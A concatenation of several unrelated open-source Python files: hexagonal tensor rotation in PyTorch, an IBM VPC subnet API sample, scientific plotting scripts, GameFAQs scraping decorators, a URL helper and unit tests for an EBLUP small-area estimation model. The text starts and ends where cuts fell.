axial_index_tensor = _get_axial_index_tensor(offset_index_tensor, add_u=additional_size)
qs = offset_index_tensor[:, :, :, 0].flatten()
rs = offset_index_tensor[:, :, :, 1].flatten()
us = axial_index_tensor[:, :, :, 0].flatten()
vs = axial_index_tensor[:, :, :, 1].flatten()
return qs, rs, us, vs
def _get_axial_cube_index_tensors(batch_size: int, height: int, width: int,
additional_size: int) -> Tuple[torch.Tensor, torch.Tensor]:
# axial coordinate is the pixel cooridnate on the tensor - center
axial_index_tensor = _get_batched_offset_index_tensor(batch_size, height, width)
axial_index_tensor -= additional_size
cube_index_tensor = _get_cube_index_tensor(axial_index_tensor)
return axial_index_tensor, cube_index_tensor
def _pad_axial_to_square(input_tensor: torch.Tensor, offset: torch.Tensor) -> torch.Tensor:
"""Pads an input axial tensor to a square such that the position (0, 0) is in the center of the new square
tensor."""
batch_size, num_channels, axial_height, axial_width = input_tensor.size()
placeholder = torch.zeros((batch_size, num_channels, axial_height * 2 + 1, axial_height * 2 + 1)).to(util.DEVICE)
pose_batch_size, pose_coord_size = offset.size()
if pose_batch_size != batch_size:
raise ValueError('Batch size of pose and input tensor are not the same: %s vs. %s' % (pose_batch_size,
batch_size))
if pose_coord_size != 2:
raise ValueError('Pose must have 2 coordinates; has %s' % pose_coord_size)
# Need to get the us, vs for the offset. Offset is in offset coordinates, not axial coordinates.
# Pose has 0th index of q, and 1th index of r.
additional_size = axial_height - axial_width
qs = offset[:, 0]
rs = offset[:, 1]
us = qs - rs // 2
u_min = axial_height - additional_size - us
u_max = u_min + axial_height
v_min = axial_height - rs
v_max = v_min + axial_width
# TDOO: maybe remove for loops
# Not sure which is faster 1. loop of contiguous memory assignments (i.e., square reigion to square reigion mapping)
# vs 2. one-time non-contiguous memory assignments (i.e., individual indicies to indicies mapping)
for b in range(batch_size):
placeholder[b, :, u_min[b]:u_max[b], v_min[b]:v_max[b]] = input_tensor[b,:,:,:]
# Create a mask for the non-padded region of axil tensor and move the mask to the coordinates of the placeholder
# If you don't create a mask, some of pixels will be outside of the placeholder after rotation
mask = torch.zeros((batch_size, axial_height * 2 + 1, axial_height * 2 + 1))
additional_size = (axial_width - 1) // 2
_, _, us, vs = _get_offset_axial_indices(batch_size, axial_width, axial_width, additional_size)
# TDOO: maybe remove for loops
# Not sure which is faster 1. loop of contiguous memory assignments (i.e., square reigion to square reigion mapping)
# vs 2. one-time non-contiguous memory assignments (i.e., individual indicies to indicies mapping)
for b in range(batch_size):
m_us, m_vs = us + u_min[b], vs + v_min[b]
mask[b, m_us, m_vs] = 1
mask = mask.bool()
return placeholder, mask
def _get_cube_rotation_matrix(rots):
assert len(rots.size()) == 1, 'Rotation is an one-dimensional tensor: %s' % rots.size()
T = torch.zeros((rots.size(0), 3, 3))
# Clockwise 1.047 radians (60') rotation. x is -y, y is -z and z is -x
rot_matrix = torch.zeros((3, 3))
# Counter-clockwise.
rot_matrix[0,2] = -1
rot_matrix[1,0] = -1
rot_matrix[2,1] = -1
# TODO: Make this loop a simple six-way look-up table.
for i, r in enumerate(rots):
matrix = torch.eye(3)
num_iters = r // math.radians(60)
num_iters = num_iters.long()
num_iters = num_iters % 6
for _ in range(num_iters):
matrix = torch.matmul(matrix, rot_matrix)
T[i,:,:] = matrix
return T.detach().to(util.DEVICE)
def _rotate_cube_indices(cube_index_tensor: torch.Tensor, rots: torch.Tensor):
batch_size, height, width, channels = cube_index_tensor.size()
assert channels == 3, 'Tensor does not have 3 channels: %s' % channels
# Calculate rotation matrices for each batch
cube_rotation_matrix = _get_cube_rotation_matrix(rots)
cube_index_tensor = cube_index_tensor.permute(0,3,1,2)
cube_index_tensor = cube_index_tensor.view(batch_size, channels, height * width)
cube_index_tensor = cube_index_tensor.float()
cube_index_tensor_rot = torch.bmm(cube_rotation_matrix, cube_index_tensor)
cube_index_tensor_rot = cube_index_tensor_rot.view(batch_size, channels, height, width)
cube_index_tensor_rot = cube_index_tensor_rot.permute(0,2,3,1)
cube_index_tensor_rot = cube_index_tensor_rot.long()
return cube_index_tensor_rot
def offset_tensor_to_axial(input_tensor: torch.Tensor) -> torch.Tensor:
"""Transforms a tensor representing offset hex representation of an environment to axial coordinates.
Inputs:
input_tensor: The input tensor. Should be a square tensor with size B x C x H x W, where H = W.
"""
# The input tensor is in offset coordinates, and should be a square matrix N x N.
batch_size, num_channels, env_height, env_width = input_tensor.size()
assert env_width == env_height, 'Tensor is not square: %s x %s' % (env_width, env_height)
# Placeholder tensor
additional_size = (env_width - 1) // 2
axial_size = env_width + additional_size
axial_tensor = torch.zeros((batch_size * num_channels, axial_size, env_width)).detach().to(util.DEVICE)
qs, rs, us, vs = _get_offset_axial_indices(batch_size * num_channels, env_height, env_width, additional_size)
indexed_input = input_tensor.view(batch_size * num_channels, env_height, env_width)[:, qs, rs]
axial_tensor[:, us, vs] = indexed_input
return axial_tensor.view(batch_size, num_channels, axial_size, env_width)
def axial_tensor_to_offset(axial_tensor: torch.Tensor) -> torch.Tensor:
# Input should be consistent rotation (i.e., not square)
# B x C x H x W
# Should return a square tensor
# Should return B x C x W x W
batch_size, num_channels, tensor_height, tensor_width = axial_tensor.size()
env_height, env_width = tensor_width, tensor_width
assert tensor_height > tensor_width, 'Axial tensor does not have a valid shape: %s x %s' % (env_width, env_height)
additional_size = tensor_height - tensor_width
axial_size = env_width + additional_size
offset_tensor = torch.zeros((batch_size * num_channels, env_width, env_width)).detach().to(util.DEVICE)
qs, rs, us, vs = _get_offset_axial_indices(batch_size * num_channels, env_height, env_width, additional_size)
indexed_axial = axial_tensor.view(batch_size * num_channels, tensor_height, tensor_width)[:, us, vs]
offset_tensor[:, qs, rs] = indexed_axial
return offset_tensor.view(batch_size, num_channels, env_height, env_width)
def translate_and_rotate(axial_tensor: torch.Tensor, target_poses: pose.Pose, is_axial_coord: bool = False) -> torch.Tensor:
# Input should be an axial tensor (not square)
# B x C x H x W
# Should return a square tensor
# Should return B x C x H' x W' where H' = W' = some function of W
padded_tensor, mask = _pad_axial_to_square(axial_tensor, offset=target_poses.position)
if is_axial_coord:
center = padded_tensor.shape[-1] // 2
slack = axial_tensor.shape[-1] //2
offset = center-slack
end = center+slack+1
mask[:,:,:] = False
mask[:,offset:end,offset:end] = True
else:
pass
# get padded placeholder and get axial and cube index of eaxh pixel locations
placeholder = torch.zeros(padded_tensor.shape).to(util.DEVICE)
center = padded_tensor.size(2) // 2
batch_size, _, height, width = padded_tensor.shape
axial_index_tensor, cube_index_tensor = _get_axial_cube_index_tensors(batch_size, height,
width,
additional_size=center)
# Rotate tensors clockwise by angles specfied by target_poses.orientation
cube_index_tensor_rot = _rotate_cube_indices(cube_index_tensor, rots=target_poses.orientation) # oonly unique by rotation
bs = _get_batch_index_tensor(batch_size, height, width)
us, vs = axial_index_tensor[:, :, :, 0] + center, axial_index_tensor[:, :, :, 1] + center
us_rot, vs_rot = cube_index_tensor_rot[:, :, :, 2] + center, cube_index_tensor_rot[:, :, :, 0] + center
bs, us, vs, us_rot, vs_rot = bs[mask], us[mask], vs[mask], us_rot[mask], vs_rot[mask]
indexed_padded = padded_tensor[bs, :, us, vs]
placeholder[bs, :, us_rot, vs_rot] = indexed_padded
return placeholder
def untransate_and_unrotate(input_tensor: torch.Tensor, source_poses: pose.Pose) -> torch.Tensor:
# Input tensor should be square
# B x C x H' x W' where H' = W' = some function of W
# Should return an axial tensor (not square)
pass
class Hex_Rotator():
"""
Speed up translation and operation if local map size if fixed.
"""
def __init__(self):
# hyperparam
self._center = 5
# mask
self._mask = torch.zeros((1, 11, 11))
_, _, us, vs = _get_offset_axial_indices(1, 5, 5, 2)
m_us, m_vs = us + 3, vs + 3
self._mask[:, m_us, m_vs] = 1
self._mask = self._mask.bool()
self._mask[:,:,:] = False
self._mask[:,3:8,3:8] = True
# precompute get_axial_cube_index_tensors
self._axial_index_tensor, cube_index_tensor = _get_axial_cube_index_tensors(1, 11, 11, additional_size=5)
cube_index_tensor = torch.cat([cube_index_tensor for _ in range(6)], 0)
self._cube_index_tensor_rots = _rotate_cube_indices(cube_index_tensor, rots=torch.tensor([i * math.radians(60) for i in range(6)]).to(util.DEVICE)) # unique by rotatioon
self._us, self._vs = self._axial_index_tensor[:, :, :, 0] + self._center, self._axial_index_tensor[:, :, :, 1] + self._center
def translate_and_rotate(self, axial_tensor: torch.Tensor, target_poses: pose.Pose):
# pad tensor
batch_size, _ , _, _ = axial_tensor.shape
placeholder = torch.zeros(axial_tensor.shape).to(util.DEVICE).type(axial_tensor.type()) #! still the largest bottleneck
height, width = 11, 11
# stack mask
mask = torch.cat([self._mask for _ in range(batch_size)], 0)
# get batch tensor
bs = _get_batch_index_tensor(batch_size, height, width)
bs = bs[mask]
# stack us and vs
us = torch.cat([self._us for _ in range(batch_size)], 0)
vs = torch.cat([self._vs for _ in range(batch_size)], 0)
us, vs = us[mask], vs[mask]
# get rotation
cube_index_tensor_rot = []
cube_index_tensor_rot = torch.stack([self._cube_index_tensor_rots[o, ...] for o in (target_poses.orientation/math.radians(60)).long()], 0)
us_rot, vs_rot = cube_index_tensor_rot[:, :, :, 2] + self._center, cube_index_tensor_rot[:, :, :, 0] + self._center
us_rot, vs_rot = us_rot[mask], vs_rot[mask]
# remove extra indicies
keep = (us_rot >= 3) & (us_rot <= 7) & (vs_rot >= 3) & (vs_rot <= 7)
bs = bs[keep]
us = us[keep]
vs = vs[keep]
us -= 3
vs -= 3
us_rot = us_rot[keep]
vs_rot = vs_rot[keep]
us_rot -= 3
vs_rot -= 3
# detach values
bs.detach()
us.detach()
vs.detach()
us_rot.detach()
vs_rot.detach()
# return values
indexed_padded = axial_tensor[bs, :, us, vs]
placeholder[bs, :, us_rot, vs_rot] = indexed_padded
return placeholder
"""
def _pad_axial_to_square(self, input_tensor: torch.Tensor) -> torch.Tensor:
batch_size, num_channels, axial_height, axial_width = input_tensor.size()
placeholder = torch.zeros((batch_size, num_channels, axial_height * 2 + 1, axial_height * 2 + 1)).to(util.DEVICE)
placeholder[:, :, 3:8, 3:8] = input_tensor
return placeholder
""" | 3.0625 | 3 |
Python/subnets.py | kparr/vpc-api-samples | 5 | 12760280 | import http.client
import json
from config import conn, headers, version, print_json
# Fetch all Subnets
# Spec: https://pages.github.ibm.com/riaas/api-spec/spec_2019-05-07/#/Subnets/list_subnets
def fetch_subnets():
payload = ""
try:
# Connect to api endpoint for subnets
conn.request("GET", "/v1/subnets?version=" + version, payload, headers)
# Get and read response data
res = conn.getresponse()
data = res.read()
# Print and return response data
print_json(data.decode("utf-8"))
return data.decode("utf-8")
# If an error happens while fetching subnets
except Exception as error:
print(f"Error fetching subnets. {error}")
raise
# Create Subnet
# Spec: https://pages.github.ibm.com/riaas/api-spec/spec_2019-05-07/#/Subnets/create_subnet
# Params:
# name: str
# vpc: str (required)
# total_ipv4_address_count: str (required)
# zone: str (required)
def create_subnet(name, vpc_id, total_ipv4_address_count, zone):
# Required payload for creating a subnet
payload = f'''
{{
"name": "{name}",
"vpc": {{
"id": "{vpc_id}"
}},
"total_ipv4_address_count": {total_ipv4_address_count},
"zone": {{
"name": "{zone}"
}}
}}
'''
try:
# Connect to api endpoint for subnets
conn.request("POST", "/v1/subnets?version=" + version, payload, headers)
# Get and read response data
res = conn.getresponse()
data = res.read()
# Print and return response data
print_json(data.decode("utf-8"))
return data.decode("utf-8")
# If an error happens while creating a subnet
except Exception as error:
print(f"Error creating subnet. {error}")
raise
fetch_subnets()
create_subnet("SUBNET_NAME", "VPC_ID", "IPV4_ADDRESS_COUNT", "ZONE")
| 2.859375 | 3 |
bayes_implicit_solvent/continuous_parameter_experiments/gd_vs_langevin/plot_rmses.py | openforcefield/bayes-implicit-solvent | 4 | 12760281 | from pickle import load
from bayes_implicit_solvent.continuous_parameter_experiments.gd_vs_langevin.autograd_based_experiment import Experiment, experiments, train_test_split, train_test_rmse, unreduce, expt_means
def load_expt_result(path):
with open(path, 'rb') as f:
result = load(f)
return result
import matplotlib.pyplot as plt
import numpy as np
expt_dataset = np.load('expt_dataset.npz')
expt_means = expt_dataset['expt_means']
def rmse(predictions, inds):
pred_kcal_mol = unreduce(predictions[inds])
expt_kcal_mol = unreduce(expt_means[inds])
rmse = np.sqrt(np.mean((pred_kcal_mol - expt_kcal_mol) ** 2))
return rmse
def train_test_rmse(predictions, split=0):
train_inds, test_inds = train_test_split(split)
train_rmse = rmse(predictions, train_inds)
test_rmse = rmse(predictions, test_inds)
return train_rmse, test_rmse
def compute_train_test_rmse_traj(prediction_traj, cv_fold=0):
train_rmses = np.zeros(len(prediction_traj))
test_rmses = np.zeros(len(prediction_traj))
print(np.array(prediction_traj).shape)
for i in range(len(prediction_traj)):
train_rmses[i], test_rmses[i] = train_test_rmse(prediction_traj[i], cv_fold)
return train_rmses, test_rmses
if __name__ == '__main__':
plt.figure(figsize=(8,4))
train_color = 'blue'
test_color = 'green'
result = load_expt_result('ll=student_t,k=1,hash(theta0)=9203586750394740867.pkl')
train_rmses, test_rmses = compute_train_test_rmse_traj(result['prediction_traj'], result['experiment'].cv_fold)
train_label = 'train'
test_label = 'test'
plt.plot(train_rmses, label=train_label, c=train_color, alpha=0.5)
plt.plot(test_rmses, label=test_label, c=test_color, linestyle='--', alpha=0.5)
plt.xlabel('iteration')
plt.ylabel('RMSE (kcal/mol)')
plt.savefig('train_test_rmses_0.png', dpi=300)
plt.close()
from glob import glob
ll = 'gaussian'
fnames = glob('july_26_results/ll={}*'.format(ll))
def plot_scatter(path):
result = load_expt_result(path)
initial_pred = result['prediction_traj'][0]
pred_kcalmol = unreduce(initial_pred)
expt_kcalmol = unreduce(expt_means)
plt.figure()
plt.scatter(pred_kcalmol, expt_kcalmol)
plt.savefig('scatter.png', dpi=300)
plt.close()
plot_scatter(fnames[0])
def plot_result(ax, ll='gaussian'):
fnames = glob('july_27_28_results/ll={}*'.format(ll))
for i, fname in enumerate(fnames):
result = load_expt_result(fname)
train_rmses, test_rmses = compute_train_test_rmse_traj(result['prediction_traj'], result['experiment'].cv_fold)
if i == 0:
train_label = 'train'
test_label = 'test'
else:
train_label = None
test_label = None
ax.plot(train_rmses, label=train_label, c=train_color, alpha=0.5)
ax.plot(test_rmses, label=test_label, c=test_color, linestyle='--', alpha=0.5)
ax.set_xlabel('iteration')
ax.set_ylabel('RMSE (kcal/mol)')
plt.legend(title='10-fold CV')
ax = plt.subplot(1,2,1)
plot_result(ax, 'gaussian')
plt.title('gaussian likelihood')
ax1 = plt.subplot(1,2,2, sharey=ax)
plot_result(ax1, 'student_t')
plt.title('student-t likelihood')
plt.tight_layout()
plt.savefig('train_test_rmses.png', dpi=300, bbox_inches='tight')
plt.close() | 2.375 | 2 |
scripts_figures/plot_figure10c_&_t3.py | guadagar/Morphological_principles_of_neuronal_mitochondria | 0 | 12760282 | <filename>scripts_figures/plot_figure10c_&_t3.py
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
import csv
import pandas as pd
from scipy import stats
import matplotlib as mpl
from matplotlib.ticker import FormatStrFormatter,ScalarFormatter
from matplotlib.lines import Line2D
import matplotlib as mpl
from matplotlib import ticker
'''
This script reads the file data_final.cvs and plots the values in Table 3
and generates the figure 10c in the paper.
GCG
07.13.21
'''
params = {'axes.labelsize': 6,
'axes.titlesize': 6,
'legend.fontsize': 5,
'xtick.labelsize': 6,
'ytick.labelsize': 6,
'figure.figsize': (1.8,1.8)}
mpl.rcParams.update(params)
name = []
vom = []
flat =[]
cat = []
sp = []
cyl = []
k1_80 = []
tot = []
scm = []
sf = []
cjs = []
s_ibm = []
cluster = []
som = []
sim = []
im_g = []
with open('data_last.csv', 'r') as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='"')
next(reader, None)
for row in reader:
name.append(row[0])
vom.append(np.float(row[1]))
som.append(np.float(row[2]))
sim.append(np.float(row[4]))
flat.append(np.float(row[16]))
sp.append(np.float(row[17]))
cat.append(np.float(row[18]))
cyl.append(np.float(row[19]))
k1_80.append(np.float(row[20]))
tot.append(np.float(row[21]))
#scm.append(np.float(row[21]))
sf.append(np.float(row[14]))
cjs.append(np.float(row[10]))
s_ibm.append(np.float(row[5]))
cluster.append(np.float(row[24]))
im_g.append(np.float(row[15])) #genus
af = np.array(flat)
asp = np.array(sp)
acat = np.array(cat)
acyl = np.array(cyl)
ak1 = np.array(k1_80)
atot= np.array(tot)
acjs = np.array(cjs)
asibm = np.array(s_ibm)
avom = np.array(vom)
asf = np.array(sf)
acl = np.array(cluster)
asom = np.array(som)
asim = np.array(sim)
aim_g =np.array(im_g)
namec = np.array(name)
l_indices = (((acl==0) & (af!=0))).nonzero()[0]
g_indices = (((acl==1) & (af!=0))).nonzero()[0]
x1 = (100*af[l_indices])/atot[l_indices]
x1a = (100*af[g_indices])/atot[g_indices]
x2 = (100*asp[l_indices])/atot[l_indices]
x2a = (100*asp[g_indices])/atot[g_indices]
x3 = (100*acat[l_indices])/atot[l_indices]
x3a = (100*acat[g_indices])/atot[g_indices]
x4 = (100*acyl[l_indices])/atot[l_indices]
x4a = (100*acyl[g_indices])/atot[g_indices]
x5 = (100*ak1[l_indices])/asom[l_indices]
x5a = (100*ak1[g_indices])/asom[g_indices]
x7 = (aim_g[l_indices])
x7a = (aim_g[g_indices])
#print('atot',atot[l_indices])
#Table 3 in the paper
print('f',np.round(np.mean(x1),decimals=2), np.round(np.mean(x1a),decimals=2),np.round(np.std(x1),decimals=2), np.round(np.std(x1a),decimals=2),stats.ks_2samp(x1,x1a)[1])
print('cat',np.round(np.mean(x3),decimals=2), np.round(np.mean(x3a),decimals=2),np.round(np.std(x3),decimals=2), np.round(np.std(x3a),decimals=2),stats.ks_2samp(x3,x3a)[1])
print('cyl',np.round(np.mean(x4),decimals=2), np.round(np.mean(x4a),decimals=2),np.round(np.std(x4),decimals=2), np.round(np.std(x4a),decimals=2),stats.ks_2samp(x4,x4a)[1])
print('s',np.round(np.mean(x2),decimals=2), np.round(np.mean(x2a),decimals=2),np.round(np.std(x2),decimals=2), np.round(np.std(x2a),decimals=2),stats.ks_2samp(x2,x2a)[1])
print('k1',np.round(np.mean(x5),decimals=2), np.round(np.mean(x5a),decimals=2),np.round(np.std(x5),decimals=2), np.round(np.std(x5a),decimals=2),stats.ks_2samp(x5,x5a)[1])
#print('k1_sa/omvol',np.round(np.mean(x5),decimals=2), np.round(np.mean(x5a),decimals=2),np.round(np.std(x5),decimals=2), np.round(np.std(x5a),decimals=2),stats.ks_2samp(x5,x5a)[1])
#Figure 7
fig, ax = plt.subplots(1,1)
plt.ylim(0,18)
plt.plot(asf[l_indices],x5, 'o', color='y',markersize='3')
plt.plot(asf[g_indices], x5a, 's', color='k',markersize='3')
circ1 = Line2D([0], [0], linestyle="none", marker="o", markersize=3, markerfacecolor="y",mec='y')
circ2 = Line2D([0], [0], linestyle="none", marker="s", markersize=3, markerfacecolor="k",mec='k')
plt.legend((circ1, circ2), ("Globular","Elongated"), numpoints=1, loc="upper right", frameon = True)
tick_spacing = 3
ax.yaxis.set_major_locator(ticker.MultipleLocator(tick_spacing))
plt.ylim(0,18)
plt.xlim(1,4.5)
plt.xlabel('Aspect ratio (L/D)')
plt.ylabel('CM SA with k1 > 80 $\mu m^{-1}$ / OM SA')
#plt.savefig('rat_sa_k1_sa_vs_ar.png',transparent=True,bbox_inches='tight',dpi = 600)
#plt.legend()
plt.show()
| 2.578125 | 3 |
websites/decorators.py | jb262/completewasteoftime | 6 | 12760283 | <reponame>jb262/completewasteoftime<filename>websites/decorators.py
'''
This module contains decorators and a parameter class for them.
'''
import re
import itertools
from bs4 import BeautifulSoup
from helper import helper
def gameinfodecorator(page):
'''
Decorator to validate the request and perform data retrieval on the base and advanced info pages.
The wrapper simply checks, if the request executed successfully (status code 200). If so, a BeautifulSoup
instance for its response is created and the actual get-method executed. If not, an error is raised.
If the request for the respective info page is None, it also raises an error.
:param page: Specifies, which request is to be used.
:raise RuntimeError: If there is no request for the specified info page or the request failed, a RuntimeError will be raised.
'''
def get_infodecorator(func):
def wrapper(*args):
result = dict()
response = getattr(args[0], page)
if not response:
raise RuntimeError(f'No response from the {page.lower()} info request received.')
if response.status_code == 200:
bs = BeautifulSoup(response.text, 'html.parser')
result = func(*args)(bs)
else:
response.close()
raise RuntimeError(f'Cannot access {page.lower()} info page. The request failed with status code {response.status_code}')
return result
return wrapper
return get_infodecorator
def gamesearchdecorator(url):
'''
Decorator to perform the usual steps needed for searching a game, given the template of the
website´s seearch page url.
:param url: The website´s template search page url.
:raise RuntimeError: If the request for the search page fails, a RuntimeError will be raised, showing the status code
of the failed request.
'''
def get_searchdecorator(func):
def wrapper(*args, **kwargs):
for page in range(kwargs['max_pages']):
query = re.sub(r'\s', '+', kwargs['game'].strip())
search_url = url.format(args[0].url, query, page)
response = helper.get_response(search_url, args[0].headers)
if response.status_code == 200:
bs = BeautifulSoup(response.text, 'html.parser')
yield func(*args, **kwargs)(bs)
else:
response.close()
raise RuntimeError(f'Search failed with status code {response.status_code}')
return wrapper
return get_searchdecorator
def allgamesdecorator(console):
'''
Decorator to retrieve all games for a given console, including gamefaqs links.
:param console: Platform, for which all games should be retrieved.
:raise RuntimeError: If the request for the `all-games-page` fails, a RuntimeError will be raised,
returning the error code of the failed request.
:raise RuntimeError: If the games lst is empty, a RuntimeError will be raised, telling the user that
no games for the specified console were found.
'''
def get_allgamesdecorator(func):
def wrapper(*args):
games = list()
page = 0
for _ in itertools.repeat(None):
url = Parameters.GameFAQs.ALL_GAMES.format(
args[0].url, console, page)
response = helper.get_response(url, args[0].headers)
if response.status_code == 200:
bs = BeautifulSoup(response.text, 'html.parser')
found_games = func(*args)(bs)
if len(found_games) == 0:
break
else:
games += found_games
page += 1
else:
response.close()
raise RuntimeError(f'Request failed with status code {response.status_code}.')
if len(games) == 0:
raise RuntimeError(f'No games for \'{console}\' found.')
return games
return wrapper
return get_allgamesdecorator
class Parameters:
'''
Parameter class, which holds the strings which are passed to the above decorators.
These parameters are specific to a certain website.
'''
class GameFAQs:
'''
Parameter class for GameFAQs
'''
BASE = 'response_base'
ADVANCED = 'response_advanced'
QUESTIONS_ANSWERED = 'response_questions_answered'
QUESTIONS_UNRESOLVED = 'response_questions_unresolved'
ANSWERS = 'response_answers'
SEARCH_URL = '{}/search?game={}&page={}'
ALL_GAMES = '{}/{}/category/999-all?page={}'
class Gamerankings:
'''
Parameter class for Gamerankings
'''
OVERVIEW = 'response_overview'
SEARCH_URL = '{}/browse.html?search={}&numrev=3&page={}' | 3.546875 | 4 |
http/general.py | ZipluxLHS/ziplux | 0 | 12760284 | <gh_stars>0
class cURL:
def __init__(self, url_='.'):
self.url = url_
def replace(self, replaceURL_, start_, end_):
'''
example: 'https://www.google.com/search'
https:// -> -1
www.google.com -> 0
search -> 1
'''
if start_ == -1:
start_ = 0
else:
start_ +=2
end_ += 2
urllist = self.url.split('/')
wrongURL = '/'.join(urllist[start_:end_])
newURL= self.url.replace(wrongURL,replaceURL_)
return newURL
| 3.078125 | 3 |
tests/sae/test_eblup_unit_model.py | samplics-org/samplics | 14 | 12760285 | import numpy as np
import pandas as pd
from samplics.sae.eblup_unit_model import EblupUnitModel
cornsoybean = pd.read_csv("./tests/sae/cornsoybean.csv")
cornsoybean_mean = pd.read_csv("./tests/sae/cornsoybeanmeans.csv")
cornsoybean = cornsoybean.sample(frac=1) # shuffle the data to remove the
# print(cornsoybean)
areas = cornsoybean["County"]
areas_list = np.unique(areas)
ys = cornsoybean["CornHec"]
Xs = cornsoybean[["CornPix", "SoyBeansPix"]]
Xmean = cornsoybean_mean[["MeanCornPixPerSeg", "MeanSoyBeansPixPerSeg"]]
# print(Xmean)
samp_size = np.array([1, 1, 1, 2, 3, 3, 3, 3, 4, 5, 5, 6])
pop_size = np.array([545, 566, 394, 424, 564, 570, 402, 567, 687, 569, 965, 556])
"""REML Method"""
eblup_bhf_reml = EblupUnitModel()
eblup_bhf_reml.fit(
ys,
Xs,
areas,
)
eblup_bhf_reml.predict(Xmean, areas_list)
def test_eblup_bhf_reml():
assert eblup_bhf_reml.method == "REML"
def test_fixed_effects_bhf_reml():
assert np.isclose(
eblup_bhf_reml.fixed_effects,
np.array([17.96398, 0.3663352, -0.0303638]),
atol=1e-6,
).all()
def test_fe_std_bhf_reml():
assert np.isclose(
eblup_bhf_reml.fe_std,
np.array([30.986801, 0.065101, 0.067583]),
atol=1e-6,
).all()
def test_gamma_bhf_reml():
assert np.isclose(
np.array(list(eblup_bhf_reml.gamma.values())),
np.array(
[
0.17537405,
0.17537405,
0.17537405,
0.29841402,
0.38950426,
0.38950426,
0.38950426,
0.38950426,
0.45965927,
0.51535245,
0.51535245,
0.56063774,
]
),
atol=1e-6,
).all()
def test_random_effects_bhf_reml():
assert np.isclose(
eblup_bhf_reml.random_effects,
np.array(
[
2.184574,
1.475118,
-4.730863,
-2.764825,
8.370915,
4.274827,
-2.705540,
1.156682,
5.026852,
-2.883398,
-8.652532,
-0.751808,
]
),
atol=1e-6,
).all()
def test_re_std_bhf_reml():
assert np.isclose(eblup_bhf_reml.re_std ** 2, 63.3149, atol=1e-6)
def test_error_var_bhf_reml():
assert np.isclose(eblup_bhf_reml.error_std ** 2, 297.7128, atol=1e-6)
def test_goodness_of_fit_bhf_reml():
assert np.isclose(eblup_bhf_reml.goodness["loglike"], -161.005759)
assert np.isclose(eblup_bhf_reml.goodness["AIC"], 326.011518)
assert np.isclose(eblup_bhf_reml.goodness["BIC"], 329.064239)
def test_convergence_bhf_reml():
assert eblup_bhf_reml.convergence["achieved"] == True
assert eblup_bhf_reml.convergence["iterations"] == 4
def test_area_estimate_bhf_reml():
assert np.isclose(
np.array(list(eblup_bhf_reml.area_est.values())),
np.array(
[
122.56367092,
123.51515946,
113.09071900,
115.02074400,
137.19621212,
108.94543201,
116.51553231,
122.76148230,
111.53048000,
124.18034553,
112.50472697,
131.25788283,
]
),
atol=1e-6,
).all()
# @pytest.mark.skip(reason="to be fixed")
def test_area_mse_bhf_reml():
assert np.isclose(
np.array(list(eblup_bhf_reml.area_mse.values())),
np.array(
[
85.495399459,
85.648949504,
85.004705566,
83.235995880,
72.017014455,
73.356967955,
72.007536645,
73.580035237,
65.299062174,
58.426265442,
57.518251822,
53.876770532,
]
),
atol=1e-6,
).all()
eblup_bhf_reml_fpc = EblupUnitModel()
eblup_bhf_reml_fpc.fit(ys, Xs, areas)
eblup_bhf_reml_fpc.predict(Xmean, areas_list, pop_size)
def test_y_predicted_bhf_reml_fpc():
assert np.isclose(
np.array(list(eblup_bhf_reml_fpc.area_est.values())),
np.array(
[
122.582519,
123.527414,
113.034260,
114.990082,
137.266001,
108.980696,
116.483886,
122.771075,
111.564754,
124.156518,
112.462566,
131.251525,
]
),
atol=1e-6,
).all()
def test_bhf_reml_to_dataframe_default():
df = eblup_bhf_reml.to_dataframe()
assert df.shape[1] == 4
assert (df.columns == ["_parameter", "_area", "_estimate", "_mse"]).all()
def test_bhf_reml_to_dataframe_not_default():
df = eblup_bhf_reml.to_dataframe(
col_names=["parameter", "small_area", "modelled_estimate", "taylor_mse"]
)
assert df.shape[1] == 4
assert (df.columns == ["parameter", "small_area", "modelled_estimate", "taylor_mse"]).all()
# Bootstrap with REML
eblup_bhf_reml_boot = EblupUnitModel()
eblup_bhf_reml_boot.fit(
ys,
Xs,
areas,
)
eblup_bhf_reml_boot.predict(Xmean, areas_list)
eblup_bhf_reml_boot.bootstrap_mse(number_reps=5, show_progress=False)
df1_reml = eblup_bhf_reml_boot.to_dataframe()
def test_bhf_reml_to_dataframe_boot_default():
assert df1_reml.shape[1] == 5
assert (df1_reml.columns == ["_parameter", "_area", "_estimate", "_mse", "_mse_boot"]).all()
df2_reml = eblup_bhf_reml_boot.to_dataframe(
col_names=["parameter", "small_area", "modelled_estimate", "taylor_mse", "boot_mse"]
)
def test_bhf_reml_to_dataframe_boot_not_default():
assert df2_reml.shape[1] == 5
assert (
df2_reml.columns
== ["parameter", "small_area", "modelled_estimate", "taylor_mse", "boot_mse"]
).all()
# Shorter output
np.random.seed(123)
samp_size_short = np.array([3, 3, 3, 4, 5, 5, 6])
pop_size_short = np.array([570, 402, 567, 687, 569, 965, 556])
pop_area_short = np.linspace(6, 12, 7).astype(int)
Xp_mean_short = Xmean.loc[5:12, :]
eblup_bhf_reml_short = EblupUnitModel()
eblup_bhf_reml_short.fit(ys, Xs, areas, intercept=True)
eblup_bhf_reml_short.predict(Xp_mean_short, pop_area_short, pop_size_short)
def test_area_estimate_bhf_reml_short():
assert np.isclose(
np.array(list(eblup_bhf_reml_short.area_est.values())),
np.array(
[
108.98069631,
116.48388625,
122.77107460,
111.56475375,
124.15651773,
112.46256629,
131.25152478,
]
),
atol=1e-6,
).all()
# @pytest.mark.skip(reason="to be fixed")
def test_area_mse_bhf_reml_short():
assert np.isclose(
np.array(list(eblup_bhf_reml_short.area_mse.values())),
np.array(
[
78.70883983,
78.02323786,
78.87309307,
70.04040931,
64.11261351,
61.87654547,
59.81982861,
]
),
atol=1e-6,
).all()
"""ML Method"""
eblup_bhf_ml = EblupUnitModel(method="ml")
eblup_bhf_ml.fit(ys, Xs, areas)
eblup_bhf_ml.predict(Xmean, areas_list)
def test_eblup_bhf_ml():
assert eblup_bhf_ml.method == "ML"
def test_fixed_effects_bhf_ml():
assert np.isclose(
eblup_bhf_ml.fixed_effects,
np.array([18.08888, 0.36566, -0.03017]),
atol=1e-5,
).all()
def test_fe_std_bhf_ml():
assert np.isclose(
eblup_bhf_ml.fe_std,
np.array([29.82724469, 0.06262676, 0.06506189]),
atol=1e-5,
).all()
def test_gamma_bhf_ml():
assert np.isclose(
np.array(list(eblup_bhf_ml.gamma.values())),
np.array(
[
0.14570573,
0.14570573,
0.14570573,
0.25435106,
0.33848019,
